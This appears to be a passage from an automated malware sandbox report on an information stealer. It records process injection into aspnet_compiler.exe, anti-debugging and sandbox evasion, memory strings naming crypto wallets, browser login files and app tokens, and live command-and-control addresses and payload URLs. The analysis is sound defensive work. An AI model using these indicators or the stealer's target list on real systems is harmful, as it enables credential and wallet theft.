                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1276Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 9604
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E430E0 sldt word ptr [ecx]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 0_2_00E46310 CheckRemoteDebuggerPresent,
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41C000
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E09008
                    Source: StZAEFSb2j.exe, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 0.0.StZAEFSb2j.exe.5d0000.0.unpack, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeQueries volume information: C:\Users\user\Desktop\StZAEFSb2j.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: aspnet_compiler.exe, 00000001.00000002.436889284.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Win32_Process.Handle="3124"oaming\Electrum\wallets\*
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Il5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    Path Interception312
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    33
                    Security Software Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium11
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API
                    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Disable or Modify Tools
                    LSASS Memory12
                    Process Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)251
                    Virtualization/Sandbox Evasion
                    Security Account Manager251
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Ingress Tool Transfer
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)312
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size Limits14
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Software Packing
                    Cached Domain Credentials123
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    StZAEFSb2j.exe34%ReversingLabsByteCode-MSIL.Infostealer.Generic
                    StZAEFSb2j.exe26%VirustotalBrowse
                    StZAEFSb2j.exe100%Joe Sandbox ML
                    No Antivirus matches
                    SourceDetectionScannerLabelLinkDownload
                    1.0.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    http://tempuri.org/t_0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://tgc8x.tk0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    https://tgc8x.tk/tt/BLACKDEV.txt100%Avira URL Cloudphishing
                    https://tgc8x.tk40%Avira URL Cloudsafe
                    http://tempuri.org/00%URL Reputationsafe
                    https://tgc8x.tkD80%Avira URL Cloudsafe
                    http://194.55.186.201:60080%Avira URL Cloudsafe
                    194.55.186.201:60080%Avira URL Cloudsafe
                    http://194.55.186.201:0%Avira URL Cloudsafe
                    https://tgc8x.tk/tt/lamb.txt100%Avira URL Cloudphishing
                    https://tgc8x.tk0%Avira URL Cloudsafe
                    http://194.55.186.201:6008/0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    tgc8x.tk
                    50.115.174.192
                    truetrue
                      unknown
                      api.ip.sb
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://tgc8x.tk/tt/BLACKDEV.txttrue
                        • Avira URL Cloud: phishing
                        unknown
                        194.55.186.201:6008true
                        • Avira URL Cloud: safe
                        unknown
                        https://tgc8x.tk/tt/lamb.txttrue
                        • Avira URL Cloud: phishing
                        unknown
                        http://194.55.186.201:6008/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ipinfo.io/ip%appdata%StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/chrome_newtabaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                            high
                            https://duckduckgo.com/ac/?q=tmpE2D.tmp.1.drfalse
                              high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Endpoint/CheckConnectResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.datacontract.org/2004/07/aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Endpoint/EnvironmentSettingsaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/t_aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/envelope/aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://search.yahoo.com?fr=crmas_sfpfaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpE2D.tmp.1.drfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope/Daspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Endpoint/CheckConnectaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                            high
